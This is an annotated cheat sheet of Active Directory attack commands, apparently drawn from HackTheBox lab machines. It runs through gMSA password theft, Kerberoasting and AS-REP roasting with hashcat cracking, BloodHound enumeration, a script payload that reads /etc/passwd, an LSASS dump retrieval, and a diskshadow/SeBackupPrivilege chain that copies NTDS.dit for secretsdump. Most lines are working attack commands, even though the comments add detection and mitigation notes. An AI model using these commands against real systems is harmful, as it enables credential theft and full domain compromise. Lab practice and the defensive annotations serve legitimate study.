# Retrieve the gMSA object together with its msDS-ManagedPassword blob.
# Risk: this attribute is only returned to principals permitted to retrieve the
# managed password, so a successful read here means the calling account is in that
# set (or the set is over-broad) — review PrincipalsAllowedToRetrieveManagedPassword.
$gmsa = Get-ADServiceAccount -Identity 'BIR-ADFS-GMSA' -Properties 'msDS-ManagedPassword'
$mp = $gmsa.'msDS-ManagedPassword'
# Decode the binary blob into its password fields. ConvertFrom-ADManagedPasswordBlob
# is the DSInternals cmdlet, not part of the built-in ActiveDirectory module.
$c = ConvertFrom-ADManagedPasswordBlob $mp
$username ="BIR-ADFS-GMSA";
# SecureCurrentPassword is already a SecureString, so it feeds straight into PSCredential.
$password = $c.SecureCurrentPassword;
$cred = New-Object System.Management.Automation.PSCredential -ArgumentList $username, $password;
# Remote session as the gMSA, just to confirm the credential works (whoami).
# Detection: WinRM/network logons by a gMSA from hosts where its service does not run
# are unusual — alert on 4624 for gMSA accounts outside their expected hosts.
Invoke-Command -ScriptBlock { whoami } -ComputerName RESEARCH -Credential $cred
# Resets Tristan.Davies's domain password using the gMSA's rights.
# NOTE(review): a cleartext password is hard-coded here and passed on the command line;
# the reset itself typically produces a 4724 event on the DC, and the new password will
# land in PowerShell script-block / transcript logs where those are enabled.
Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock {net user Tristan.Davies bunnys666 /domain}
# Kerberoast: request a service ticket for every SPN-bearing user and write the TGS
# hashes to ./hash. Mitigation: long random passwords or gMSAs for SPN accounts and
# AES-only encryption types; detection: bursts of 4769 with RC4 (0x17) from one client.
# NOTE: the domain password sits on the command line, visible in shell history and ps.
GetUserSPNs.py search.htb/hope.sharp:'IsolationIsKey?' -request -dc-ip 10.10.11.129 -outputfile hash
# AS-REP roast: for each name in usernames.txt, send an AS-REQ without pre-authentication;
# accounts flagged "Do not require Kerberos preauthentication" return a crackable hash.
# Mitigation: clear that flag; detection: many 4768 events with Pre-Authentication Type 0.
GetNPUsers.py BLACKFIELD.local/ -usersfile usernames.txt -format hashcat -dc-ip 10.10.10.192 -outputfile AS-REP
# Offline crack of the AS-REP output; -m 18200 is hashcat's Kerberos 5 AS-REP etype 23 mode.
hashcat -m 18200 -a 0 AS-REP ~/Desktop/htb-tool/rockyou.txt
# BloodHound collection (-c all) with the same credential. The LDAP/SMB/session
# enumeration this generates from a single host is a usable detection signal.
./bloodhound.py -d search.htb -u hope.sharp -p 'IsolationIsKey?' -ns 10.10.11.129 -c all
<!-- XHR to file:///etc/passwd with the response written into the document. This only
     succeeds where the rendering engine permits file:// reads from the page's origin
     (e.g. a server-side HTML-to-PDF or headless-browser renderer fed untrusted HTML).
     Mitigation: disable local-file access in the renderer and sanitize user-supplied HTML. -->
<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///etc/passwd");x.send();</script>
# Anonymous (null) bind: -D '' -w '' supplies no DN or password and dumps the whole
# cascade.local naming context to ldap.log. Mitigation: disallow anonymous LDAP reads
# on the DCs (the dSHeuristics anonymous-access setting). Style: $ip should be quoted
# ("$ip"); newer OpenLDAP clients also prefer -H ldap://host over the -h form.
ldapsearch -x -h $ip -D '' -w '' -b "DC=cascade,DC=local" > ldap.log
# Enumerate tombstoned / recycled objects (isDeleted = TRUE), excluding the container itself.
# The filter is single-quoted on purpose: the AD filter parser resolves $true by itself.
Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects
# Same query but pulling every attribute of each deleted object (-Properties *).
# Risk: attributes retained on deleted objects can still expose data; reading the
# Deleted Objects container needs explicit rights, so audit who holds them.
Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
# Recursive SMB fetch of an LSASS memory dump from the 'forensic' share, with the share
# credential embedded in the URL (visible in history and process listings).
# Risk: an lsass dump holds logon secrets; shares storing such artefacts should be
# ACL-restricted and their access audited (5140/5145 where share auditing is enabled).
smbget -R smb://audit2020:'Password123'@10.10.10.192/forensic/memory_analysis/lsass.zip
# diskshadow script: take a persistent VSS snapshot of C: with no writers involved and
# expose it as W:, so in-use files can be copied from the snapshot instead of the live volume.
# Detection: diskshadow.exe launched with a script file, VSS event-log entries for shadow
# creation, and .cab metadata files written to unexpected paths.
set context persistent nowriters
# Metadata written under the print-spooler colour directory — presumably picked as a
# location writable by non-admin users; confirm against the host's ACLs.
set metadata c:\windows\system32\spool\drivers\color\example.cab
set verbose on
begin backup
add volume c: alias mydrive
create
# Mount the new shadow copy at drive letter W:.
expose %mydrive% w:
end backup
#evil-winrm
# Upload the SeBackupPrivilege helper DLLs into the session's working directory.
# Mitigation: review Backup Operators membership (it grants SeBackupPrivilege);
# detection: Import-Module of unsigned DLLs surfaces in PowerShell module logging.
upload SeBackupPrivilegeUtils.dll
upload SeBackupPrivilegeCmdLets.dll
# import module cmdlets command
Import-Module .\SeBackupPrivilegeCmdLets.dll
Import-Module .\SeBackupPrivilegeUtils.dll
# Copy NTDS.dit out of the exposed shadow copy (W:, from the diskshadow 'expose' step).
# The cmdlet presumably opens the file with backup semantics, bypassing its normal ACL.
Copy-FileSeBackupPrivilege w:\windows\NTDS\ntds.dit c:\temp\ntds.dit -Overwrite
# Export the SYSTEM hive, needed to decrypt ntds.dit.
# NOTE(review): reg save expects a file name; the trailing backslash names a directory.
# The later secretsdump call reads a file called 'system', so c:\temp\system is likely intended.
reg save HKLM\SYSTEM c:\temp\
# Offline extraction of domain secrets from the copied ntds.dit + SYSTEM hive (LOCAL mode;
# -just-dc restricts output to the NTDS-derived hashes and keys). Anyone who can read
# these two files holds every domain credential — treat such copies as crown-jewel artefacts.
secretsdump.py -ntds ntds.dit -system system -just-dc LOCAL
# Wordlist-based subdomain enumeration of realcorp.htb against the target DNS server.
# -v prints every attempt, so this is very noisy; server-side DNS query logging captures it.
dnsenum --dnsserver 10.10.10.224 -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt realcorp.htb -u z -v
# Authenticate to the Kerberos admin server as kadmin/admin using the host keytab.
# Risk: a keytab carrying an admin principal allows full realm administration;
# /etc/krb5.keytab should be root-only and should not contain the kadmin/admin key.
kadmin -kt /etc/krb5.keytab -p kadmin/admin@REALCORP.HTB